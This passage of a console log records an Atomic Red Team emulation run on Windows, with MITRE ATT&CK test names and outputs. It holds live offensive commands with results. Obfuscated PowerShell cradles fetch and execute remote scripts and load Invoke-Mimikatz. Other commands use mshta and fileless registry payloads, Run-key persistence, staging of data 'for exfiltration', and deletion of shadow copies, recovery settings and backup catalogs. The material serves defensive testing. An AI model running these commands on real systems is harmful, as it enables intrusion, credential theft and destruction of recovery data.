636 (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::Rea
637dAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
638(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Jo
639in([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
640Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH
641'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsO
642bject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM
643|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J
644((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem
645Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&(
646''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
647
648THIS CRADLE WORKED!!!
649 --
650 SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION
651
652Function
653 Invoke-Mimikatz
654 (tutorial version strictly for lulz) has now been set.
655You can test it by running:
656 Invoke-Mimikatz -DumpCreds
657 (or
658 -DumpCr
659 for short).
660
661THIS CRADLE WORKED!!!
662 --
663 SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION
664
665Function
666 Invoke-Mimikatz
667 (tutorial version strictly for lulz) has now been set.
668You can test it by running:
669 Invoke-Mimikatz -DumpCreds
670 (or
671 -DumpCr
672 for short).
673
674THIS CRADLE WORKED!!!
675 --
676 SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION
677
678Function
679 Invoke-Mimikatz
680 (tutorial version strictly for lulz) has now been set.
681You can test it by running:
682 Invoke-Mimikatz -DumpCreds
683 (or
684 -DumpCr
685 for short).
686
687Determining tests for Windows
688Determining manual tests
689[********BEGIN TEST*******]
690PowerShell T1086
691PowerShell Add User
692Using PS 5.1, add a user via CLI
693
694Replacing inputArgs with default values
695Invoking Atomic Tests using defined executor
696Performing the operation "Execute Atomic Test" on target "PowerShell Add User".
697PowerShell:
698 $Secure_String_Pwd = ConvertTo-SecureString "P@ssW0rD!" -AsPlainText -Force
699New-LocalUser 'Atomic' -Password $Secure_String_Pwd -FullName 'Atomic' -Description 'Red'
700
701PowerShell
702 $Secure_String_Pwd = ConvertTo-SecureString "P@ssW0rD!" -AsPlainText -Force
703New-LocalUser 'Atomic' -Password $Secure_String_Pwd -FullName 'Atomic' -Description 'Red'
704
705
706Name Enabled Description
707---- ------- -----------
708Atomic True Red
709Determining tests for Windows
710Determining manual tests
711[********BEGIN TEST*******]
712PowerShell T1086
713Powershell MsXml COM object - no prompt
714Provided by https://github.com/mgreen27/mgreen27.github.io
715Powershell MsXml COM object.
716Not proxy aware removing cache although does not appear to write to those locations
717
718Replacing inputArgs with default values
719Invoking Atomic Tests using defined executor
720Performing the operation "Execute Atomic Test" on target "Powershell MsXml COM object - no prompt".
721PowerShell:
722 $objXMLHTTP = New-Object -ComObject MSXML2.ServerXMLHTTP
723$objXMLHTTP.Open("GET",
724"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1", $False)
725$objXMLHTTP.send()
726iex $objXMLHTTP.ResponseText
727
728PowerShell
729 $objXMLHTTP = New-Object -ComObject MSXML2.ServerXMLHTTP
730$objXMLHTTP.Open("GET",
731"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1", $False)
732$objXMLHTTP.send()
733iex $objXMLHTTP.ResponseText
734
7352019-09-03T03:45:36 Download Cradle test success!
736
737Determining tests for Windows
738Determining manual tests
739[********BEGIN TEST*******]
740PowerShell T1086
741Powershell XML requests
742Provided by https://github.com/mgreen27/mgreen27.github.io
743Powershell xml download request
744
745Replacing inputArgs with default values
746Invoking Atomic Tests using defined executor
747Performing the operation "Execute Atomic Test" on target "Powershell XML requests".
748PowerShell:
749 $Xml = (New-Object System.Xml.XmlDocument);
750$Xml.Load('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml');
751$Xml.command.a.execute | IEX
752
753PowerShell
754 $Xml = (New-Object System.Xml.XmlDocument);
755$Xml.Load('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml');
756$Xml.command.a.execute | IEX
757
7582019-09-03T03:45:37 Download Cradle test success!
759
760Determining tests for Windows
761Determining manual tests
762[********BEGIN TEST*******]
763PowerShell T1086
764Powershell invoke mshta.exe download
765Provided by https://github.com/mgreen27/mgreen27.github.io
766Powershell invoke mshta to download payload
767
768Replacing inputArgs with default values
769Invoking Atomic Tests using defined executor
770Performing the operation "Execute Atomic Test" on target "Powershell invoke mshta.exe download".
771PowerShell:
772 C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryc
773o/atomic-red-team/master/atomics/T1086/payloads/mshta.sct').Exec();close()"
774
775PowerShell
776 C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryc
777o/atomic-red-team/master/atomics/T1086/payloads/mshta.sct').Exec();close()"
778
779Determining tests for Windows
780Determining manual tests
781[********BEGIN TEST*******]
782PowerShell T1086
783PowerShell Fileless Script Execution
784Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections.
785
786Invoking Atomic Tests using defined executor
787Performing the operation "Execute Atomic Test" on target "PowerShell Fileless Script Execution".
788Command Prompt:
789 reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggJ0M6L1dpbm
790Rvd3MvVGVtcC9hcnQtbWFya2VyLnR4dCcgLXZhbHVlICJIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0i" /f
791powershell.exe -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp
792'HKCU:\Software\Classes\AtomicRedTeam').ART)))
793
794Command Prompt:
795 reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggJ0M6L1dpbm
796Rvd3MvVGVtcC9hcnQtbWFya2VyLnR4dCcgLXZhbHVlICJIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0i" /f
797powershell.exe -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp
798'HKCU:\Software\Classes\AtomicRedTeam').ART)))
799
800The operation completed successfully.
801
802[!!!!!!!!END TEST!!!!!!!]
803
804
805Executing T1059 technique
806Attempting to run Atomic Techniques
807Tarcking UUID is T1059_atomictest
808Attempting to convert files from yaml
809path: C:\AtomicRedTeam\atomics\T1059\T1059.yaml
810file: C:\AtomicRedTeam\atomics\T1059\T1059.yaml
811Converting C:\AtomicRedTeam\atomics\T1059\T1059.yaml from Yaml
812Determining tests for Windows
813Unable to run non-Windows tests
814Determining tests for Windows
815Determining manual tests
816[********BEGIN TEST*******]
817Command-Line Interface T1059
818Command-Line Interface(cmd.exe)
819Using cmd.exe
820
821This will run cmd.exe end exit
822
823Invoking Atomic Tests using defined executor
824Performing the operation "Execute Atomic Test" on target "Command-Line Interface(cmd.exe)".
825Command Prompt:
826 cmd.exe /c echo "hello"
827
828Command Prompt:
829 cmd.exe /c echo "hello"
830
831 hello
832[!!!!!!!!END TEST!!!!!!!]
833
834
835Executing T1060 technique
836Attempting to run Atomic Techniques
837Tarcking UUID is T1060_atomictest
838Attempting to convert files from yaml
839path: C:\AtomicRedTeam\atomics\T1060\T1060.yaml
840file: C:\AtomicRedTeam\atomics\T1060\T1060.yaml
841Converting C:\AtomicRedTeam\atomics\T1060\T1060.yaml from Yaml
842Determining tests for Windows
843Determining manual tests
844[********BEGIN TEST*******]
845Registry Run Keys / Start Folder T1060
846Reg Key Run
847Run Key Persistence
848
849Replacing inputArgs with default values
850Invoking Atomic Tests using defined executor
851Performing the operation "Execute Atomic Test" on target "Reg Key Run".
852Command Prompt:
853 REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D
854"C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"
855REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f
856
857Command Prompt:
858 REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D
859"C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"
860REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f
861
862The operation completed successfully.
863
864The operation completed successfully.
865
866Determining tests for Windows
867Determining manual tests
868[********BEGIN TEST*******]
869Registry Run Keys / Start Folder T1060
870Reg Key RunOnce
871RunOnce Key Persistence
872
873Replacing inputArgs with default values
874Invoking Atomic Tests using defined executor
875Performing the operation "Execute Atomic Test" on target "Reg Key RunOnce".
876Command Prompt:
877 REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d
878"C:\AtomicRedTeam\atomics\T1138\src\AtomicTest.dll" /f
879REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f
880
881Command Prompt:
882 REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d
883"C:\AtomicRedTeam\atomics\T1138\src\AtomicTest.dll" /f
884REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f
885
886The operation completed successfully.
887
888The operation completed successfully.
889
890Determining tests for Windows
891Determining manual tests
892[********BEGIN TEST*******]
893Registry Run Keys / Start Folder T1060
894PowerShell Registry RunOnce
895RunOnce Key Persistence via PowerShell
896
897Replacing inputArgs with default values
898Invoking Atomic Tests using defined executor
899Performing the operation "Execute Atomic Test" on target "PowerShell Registry RunOnce".
900PowerShell:
901 $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
902set-itemproperty $RunOnceKey "NextRun" 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.git
903hubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
904Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
905
906PowerShell
907 $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
908set-itemproperty $RunOnceKey "NextRun" 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.git
909hubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
910Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
911
912Determining tests for Windows
913Determining manual tests
914[********BEGIN TEST*******]
915Registry Run Keys / Start Folder T1060
916Startup Folder
917Add Shortcut To Startup via PowerShell
918
919Replacing inputArgs with default values
920Invoking Atomic Tests using defined executor
921Performing the operation "Execute Atomic Test" on target "Startup Folder".
922PowerShell:
923 $TargetFile = "C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"
924$ShortcutFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk"
925$WScriptShell = New-Object -ComObject WScript.Shell
926$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
927$Shortcut.TargetPath = $TargetFile
928$Shortcut.Save()
929
930PowerShell
931 $TargetFile = "C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"
932$ShortcutFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk"
933$WScriptShell = New-Object -ComObject WScript.Shell
934$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
935$Shortcut.TargetPath = $TargetFile
936$Shortcut.Save()
937
938[!!!!!!!!END TEST!!!!!!!]
939
940
941Executing T1105 technique
942Attempting to run Atomic Techniques
943Tarcking UUID is T1105_atomictest
944Attempting to convert files from yaml
945path: C:\AtomicRedTeam\atomics\T1105\T1105.yaml
946file: C:\AtomicRedTeam\atomics\T1105\T1105.yaml
947Converting C:\AtomicRedTeam\atomics\T1105\T1105.yaml from Yaml
948Determining tests for Windows
949Unable to run non-Windows tests
950Determining tests for Windows
951Unable to run non-Windows tests
952Determining tests for Windows
953Unable to run non-Windows tests
954Determining tests for Windows
955Unable to run non-Windows tests
956Determining tests for Windows
957Unable to run non-Windows tests
958Determining tests for Windows
959Unable to run non-Windows tests
960Determining tests for Windows
961Determining manual tests
962[********BEGIN TEST*******]
963Remote File Copy T1105
964certutil download (urlcache)
965Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works!
966
967Replacing inputArgs with default values
968Invoking Atomic Tests using defined executor
969Performing the operation "Execute Atomic Test" on target "certutil download (urlcache)".
970Command Prompt:
971 cmd /c certutil -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
972Atomic-license.txt
973
974Command Prompt:
975 cmd /c certutil -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
976Atomic-license.txt
977
978**** Online ****
979CertUtil: -URLCache command completed successfully.
980Determining tests for Windows
981Determining manual tests
982[********BEGIN TEST*******]
983Remote File Copy T1105
984certutil download (verifyctl)
985Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works!
986
987Replacing inputArgs with default values
988Invoking Atomic Tests using defined executor
989Performing the operation "Execute Atomic Test" on target "certutil download (verifyctl)".
990PowerShell:
991 $datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
992New-Item -Path $datePath -ItemType Directory
993Set-Location $datePath
994certutil -verifyctl -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
995Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination
996Atomic-license.txt }
997
998PowerShell
999 $datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
1000New-Item -Path $datePath -ItemType Directory
1001Set-Location $datePath
1002certutil -verifyctl -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
1003Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination
1004Atomic-license.txt }
1005
1006
1007PSPath : Microsoft.PowerShell.Core\FileSystem::C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\ce
1008 rtutil-2019_09_03_03_46
1009PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam
1010PSChildName : certutil-2019_09_03_03_46
1011PSDrive : C
1012PSProvider : Microsoft.PowerShell.Core\FileSystem
1013PSIsContainer : True
1014Name : certutil-2019_09_03_03_46
1015FullName : C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46
1016Parent : Invoke-AtomicRedTeam
1017Exists : True
1018Root : C:\
1019Extension :
1020CreationTime : 9/3/2019 3:46:43 AM
1021CreationTimeUtc : 9/3/2019 10:46:43 AM
1022LastAccessTime : 9/3/2019 3:46:43 AM
1023LastAccessTimeUtc : 9/3/2019 10:46:43 AM
1024LastWriteTime : 9/3/2019 3:46:43 AM
1025LastWriteTimeUtc : 9/3/2019 10:46:43 AM
1026Attributes : Directory
1027Mode : d-----
1028BaseName : certutil-2019_09_03_03_46
1029Target : {}
1030LinkType :
1031
1032CertUtil: -verifyCTL command FAILED: 0x8009310b (ASN: 267 CRYPT_E_ASN1_BADTAG)
1033CertUtil: ASN1 bad tag value met.
1034Determining tests for Windows
1035Determining manual tests
1036[********BEGIN TEST*******]
1037Remote File Copy T1105
1038Windows - BITSAdmin BITS Download
1039This test uses BITSAdmin.exe to schedule a BITS job for the download of a file.
1040This technique is used by Qbot malware to download payloads.
1041
1042Replacing inputArgs with default values
1043Invoking Atomic Tests using defined executor
1044Performing the operation "Execute Atomic Test" on target "Windows - BITSAdmin BITS Download".
1045Command Prompt:
1046 C:\Windows\System32\bitsadmin.exe /transfer qcxjb7 /Priority HIGH
1047https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt Atomic-license.txt
1048Command Prompt:
1049 C:\Windows\System32\bitsadmin.exe /transfer qcxjb7 /Priority HIGH
1050https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt Atomic-license.txt
1051
1052BITSADMIN version 3.0
1053BITS administration utility.
1054(C) Copyright Microsoft Corp.
1055
1056Unable to add file - 0x80070057
1057The parameter is incorrect.
1058
1059
1060[!!!!!!!!END TEST!!!!!!!]
1061
1062
1063Executing T1002 technique
1064Attempting to run Atomic Techniques
1065Tarcking UUID is T1002_atomictest
1066Attempting to convert files from yaml
1067path: C:\AtomicRedTeam\atomics\T1002\T1002.yaml
1068file: C:\AtomicRedTeam\atomics\T1002\T1002.yaml
1069Converting C:\AtomicRedTeam\atomics\T1002\T1002.yaml from Yaml
1070Determining tests for Windows
1071Determining manual tests
1072[********BEGIN TEST*******]
1073Data Compressed T1002
1074Compress Data for Exfiltration With PowerShell
1075An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration
1076
1077Replacing inputArgs with default values
1078Invoking Atomic Tests using defined executor
1079Performing the operation "Execute Atomic Test" on target "Compress Data for Exfiltration With PowerShell".
1080PowerShell:
1081 dir C:\AtomicRedTeam\atomics\T1002\* -Recurse | Compress-Archive -DestinationPath C:\Data.zip -Update
1082
1083PowerShell
1084 dir C:\AtomicRedTeam\atomics\T1002\* -Recurse | Compress-Archive -DestinationPath C:\Data.zip -Update
1085
1086Determining tests for Windows
1087Determining manual tests
1088[********BEGIN TEST*******]
1089Data Compressed T1002
1090Compress Data for Exfiltration With Rar
1091An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration
1092
1093Replacing inputArgs with default values
1094Invoking Atomic Tests using defined executor
1095Performing the operation "Execute Atomic Test" on target "Compress Data for Exfiltration With Rar".
1096PowerShell:
1097 & 'C:\Program Files\WinRAR\Rar.exe' a -r C:\exfilthis.rar C:\AtomicRedTeam\atomics\T1002\*
1098
1099PowerShell
1100 & 'C:\Program Files\WinRAR\Rar.exe' a -r C:\exfilthis.rar C:\AtomicRedTeam\atomics\T1002\*
1101
1102& : The term 'C:\Program Files\WinRAR\Rar.exe' is not recognized as the name of a cmdlet, function, script file, or
1103operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try
1104again.
1105At line:1 char:32
1106+ ... oke-Command -ScriptBlock {& 'C:\Program Files\WinRAR\Rar.exe' a -r C: ...
1107+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1108 + CategoryInfo : ObjectNotFound: (C:\Program Files\WinRAR\Rar.exe:String) [], CommandNotFoundException
1109 + FullyQualifiedErrorId : CommandNotFoundException
1110
1111Determining tests for Windows
1112Determining manual tests
1113[********BEGIN TEST*******]
1114Data Compressed T1002
1115Compress Data for Exfiltration With 7Zip
1116An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration
1117
1118Replacing inputArgs with default values
1119Invoking Atomic Tests using defined executor
1120Performing the operation "Execute Atomic Test" on target "Compress Data for Exfiltration With 7Zip".
1121PowerShell:
1122 & 'C:\Program Files\7-Zip\7z.exe' a -t7z C:\exfilthis.7z C:\AtomicRedTeam\atomics\T1002\T1002.yaml
1123
1124PowerShell
1125 & 'C:\Program Files\7-Zip\7z.exe' a -t7z C:\exfilthis.7z C:\AtomicRedTeam\atomics\T1002\T1002.yaml
1126
1127
11287-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21
1129
1130Scanning the drive:
11311 file, 4149 bytes (5 KiB)
1132
1133Creating archive: C:\exfilthis.7z
1134
1135Add new data to archive: 1 file, 4149 bytes (5 KiB)
1136
1137
1138Files read from disk: 1
1139Archive size: 1059 bytes (2 KiB)
1140Everything is Ok
1141Determining tests for Windows
1142Unable to run non-Windows tests
1143Determining tests for Windows
1144Unable to run non-Windows tests
1145Determining tests for Windows
1146Unable to run non-Windows tests
1147[!!!!!!!!END TEST!!!!!!!]
1148
1149
1150Executing T1053 technique
1151Attempting to run Atomic Techniques
1152Tarcking UUID is T1053_atomictest
1153Attempting to convert files from yaml
1154path: C:\AtomicRedTeam\atomics\T1053\T1053.yaml
1155file: C:\AtomicRedTeam\atomics\T1053\T1053.yaml
1156Converting C:\AtomicRedTeam\atomics\T1053\T1053.yaml from Yaml
1157Determining tests for Windows
1158Determining manual tests
1159[********BEGIN TEST*******]
1160Scheduled Task T1053
1161At.exe Scheduled task
1162Executes cmd.exe
1163Note: deprecated in Windows 8+
1164
1165Invoking Atomic Tests using defined executor
1166Performing the operation "Execute Atomic Test" on target "At.exe Scheduled task".
1167Command Prompt:
1168 at 13:20 /interactive cmd
1169
1170Command Prompt:
1171 at 13:20 /interactive cmd
1172
1173The AT command has been deprecated. Please use schtasks.exe instead.
1174
1175Warning: Due to security enhancements, this task will run at the time
1176expected but not interactively.
1177Use schtasks.exe utility if interactive task is required ('schtasks /?'
1178for details).
1179The request is not supported.
1180Determining tests for Windows
1181Determining manual tests
1182[********BEGIN TEST*******]
1183Scheduled Task T1053
1184Scheduled task Local
1185
1186Replacing inputArgs with default values
1187Invoking Atomic Tests using defined executor
1188Performing the operation "Execute Atomic Test" on target "Scheduled task Local".
1189Command Prompt:
1190 schtasks /delete /tn spawn /F
1191SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
1192
1193Command Prompt:
1194 schtasks /delete /tn spawn /F
1195SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
1196
1197cmd.exe : ERROR: The system cannot find the file specified.
1198At line:1 char:1
1199+ cmd.exe /c "schtasks /delete /tn spawn /F"
1200+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1201 + CategoryInfo : NotSpecified: (ERROR: The syst...file specified.:String) [], RemoteException
1202 + FullyQualifiedErrorId : NativeCommandError
1203
1204
1205
1206SUCCESS: The scheduled task "spawn" has successfully been created.
1207[!!!!!!!!END TEST!!!!!!!]
1208
1209
1210Executing T1107 technique
1211Attempting to run Atomic Techniques
1212Tarcking UUID is T1107_atomictest
1213Attempting to convert files from yaml
1214path: C:\AtomicRedTeam\atomics\T1107\T1107.yaml
1215file: C:\AtomicRedTeam\atomics\T1107\T1107.yaml
1216Converting C:\AtomicRedTeam\atomics\T1107\T1107.yaml from Yaml
1217Determining tests for Windows
1218Unable to run non-Windows tests
1219Determining tests for Windows
1220Unable to run non-Windows tests
1221Determining tests for Windows
1222Unable to run non-Windows tests
1223Determining tests for Windows
1224Determining manual tests
1225[********BEGIN TEST*******]
1226File Deletion T1107
1227Delete a single file - Windows cmd
1228Delete a single file from the temporary directory using cmd.exe
1229
1230Replacing inputArgs with default values
1231Invoking Atomic Tests using defined executor
1232Performing the operation "Execute Atomic Test" on target "Delete a single file - Windows cmd".
1233Command Prompt:
1234 echo 'test' > C:\Windows\Temp\victim-file-cmd.txt
1235del /f /Q C:\Windows\Temp\victim-file-cmd.txt
1236
1237Command Prompt:
1238 echo 'test' > C:\Windows\Temp\victim-file-cmd.txt
1239del /f /Q C:\Windows\Temp\victim-file-cmd.txt
1240
1241Determining tests for Windows
1242Determining manual tests
1243[********BEGIN TEST*******]
1244File Deletion T1107
1245Delete an entire folder - Windows cmd
1246Recursively delete the temporary directory and all files contained within it using cmd.exe
1247
1248Replacing inputArgs with default values
1249Invoking Atomic Tests using defined executor
1250Performing the operation "Execute Atomic Test" on target "Delete an entire folder - Windows cmd".
1251Command Prompt:
1252 mkdir C:\Windows\Temp\victim-files-folder
1253del /f /S /Q C:\Windows\Temp\victim-files-folder
1254
1255Command Prompt:
1256 mkdir C:\Windows\Temp\victim-files-folder
1257del /f /S /Q C:\Windows\Temp\victim-files-folder
1258
1259Determining tests for Windows
1260Determining manual tests
1261[********BEGIN TEST*******]
1262File Deletion T1107
1263Delete a single file - Windows PowerShell
1264Delete a single file from the temporary directory using Powershell
1265
1266Replacing inputArgs with default values
1267Invoking Atomic Tests using defined executor
1268Performing the operation "Execute Atomic Test" on target "Delete a single file - Windows PowerShell".
1269PowerShell:
1270 echo 'test' > C:\Windows\Temp\victim-files-ps.txt
1271Remove-Item -path "C:\Windows\Temp\victim-files-ps.txt"
1272
1273PowerShell
1274 echo 'test' > C:\Windows\Temp\victim-files-ps.txt
1275Remove-Item -path "C:\Windows\Temp\victim-files-ps.txt"
1276
1277Determining tests for Windows
1278Determining manual tests
1279[********BEGIN TEST*******]
1280File Deletion T1107
1281Delete an entire folder - Windows PowerShell
1282Recursively delete the temporary directory and all files contained within it using Powershell
1283
1284Replacing inputArgs with default values
1285Invoking Atomic Tests using defined executor
1286Performing the operation "Execute Atomic Test" on target "Delete an entire folder - Windows PowerShell".
1287PowerShell:
1288 mkdir C:\Windows\Temp\victim-files-ps
1289Remove-Item -path "C:\Windows\Temp\victim-files-ps" -recurse
1290
1291PowerShell
1292 mkdir C:\Windows\Temp\victim-files-ps
1293Remove-Item -path "C:\Windows\Temp\victim-files-ps" -recurse
1294
1295
1296PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Windows\Temp\victim-files-ps
1297PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Windows\Temp
1298PSChildName : victim-files-ps
1299PSDrive : C
1300PSProvider : Microsoft.PowerShell.Core\FileSystem
1301PSIsContainer : True
1302Name : victim-files-ps
1303FullName : C:\Windows\Temp\victim-files-ps
1304Parent : Temp
1305Exists : True
1306Root : C:\
1307Extension :
1308CreationTime : 9/3/2019 3:47:47 AM
1309CreationTimeUtc : 9/3/2019 10:47:47 AM
1310LastAccessTime : 9/3/2019 3:47:47 AM
1311LastAccessTimeUtc : 9/3/2019 10:47:47 AM
1312LastWriteTime : 9/3/2019 3:47:47 AM
1313LastWriteTimeUtc : 9/3/2019 10:47:47 AM
1314Attributes : Directory
1315Mode : d-----
1316BaseName : victim-files-ps
1317Target : {}
1318LinkType :
1319
1320Determining tests for Windows
1321Determining manual tests
1322[********BEGIN TEST*******]
1323File Deletion T1107
1324Delete VSS - vssadmin
1325Delete all volume shadow copies with vssadmin.exe
1326
1327Invoking Atomic Tests using defined executor
1328Performing the operation "Execute Atomic Test" on target "Delete VSS - vssadmin".
1329Command Prompt:
1330 vssadmin.exe Delete Shadows /All /Quiet
1331
1332Command Prompt:
1333 vssadmin.exe Delete Shadows /All /Quiet
1334
1335vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
1336(C) Copyright 2001-2013 Microsoft Corp.
1337
1338No items found that satisfy the query.
1339Determining tests for Windows
1340Determining manual tests
1341[********BEGIN TEST*******]
1342File Deletion T1107
1343Delete VSS - wmic
1344Delete all volume shadow copies with wmic
1345
1346Invoking Atomic Tests using defined executor
1347Performing the operation "Execute Atomic Test" on target "Delete VSS - wmic".
1348Command Prompt:
1349 wmic shadowcopy delete
1350
1351Command Prompt:
1352 wmic shadowcopy delete
1353
1354No Instance(s) Available.
1355
1356Determining tests for Windows
1357Determining manual tests
1358[********BEGIN TEST*******]
1359File Deletion T1107
1360bcdedit
1361This test leverages `bcdedit` to remove boot-time recovery measures.
1362
1363Invoking Atomic Tests using defined executor
1364Performing the operation "Execute Atomic Test" on target "bcdedit".
1365Command Prompt:
1366 bcdedit /set {default} bootstatuspolicy ignoreallfailures
1367bcdedit /set {default} recoveryenabled no
1368
1369Command Prompt:
1370 bcdedit /set {default} bootstatuspolicy ignoreallfailures
1371bcdedit /set {default} recoveryenabled no
1372
1373The operation completed successfully.
1374The operation completed successfully.
1375Determining tests for Windows
1376Determining manual tests
1377[********BEGIN TEST*******]
1378File Deletion T1107
1379wbadmin
1380This test deletes Windows Backup catalogs.
1381
1382Invoking Atomic Tests using defined executor
1383Performing the operation "Execute Atomic Test" on target "wbadmin".
1384Command Prompt:
1385 wbadmin delete catalog -quiet
1386
1387Command Prompt:
1388 wbadmin delete catalog -quiet
1389
1390wbadmin 1.0 - Backup command-line tool
1391(C) Copyright 2013 Microsoft Corporation. All rights reserved.
1392
1393The backup catalog has been successfully deleted.
1394Determining tests for Windows
1395Unable to run non-Windows tests
1396[!!!!!!!!END TEST!!!!!!!]
1397
1398
1399Executing T1057 technique
1400Attempting to run Atomic Techniques
1401Tarcking UUID is T1057_atomictest
1402Attempting to convert files from yaml
1403path: C:\AtomicRedTeam\atomics\T1057\T1057.yaml
1404file: C:\AtomicRedTeam\atomics\T1057\T1057.yaml
1405Converting C:\AtomicRedTeam\atomics\T1057\T1057.yaml from Yaml
1406Determining tests for Windows
1407Unable to run non-Windows tests
1408Determining tests for Windows
1409Determining manual tests
1410[********BEGIN TEST*******]
1411Process Discovery T1057
1412Process Discovery - tasklist
1413Process Discovery using tasklist.exe
1414
1415Invoking Atomic Tests using defined executor
1416Performing the operation "Execute Atomic Test" on target "Process Discovery - tasklist".
1417Command Prompt:
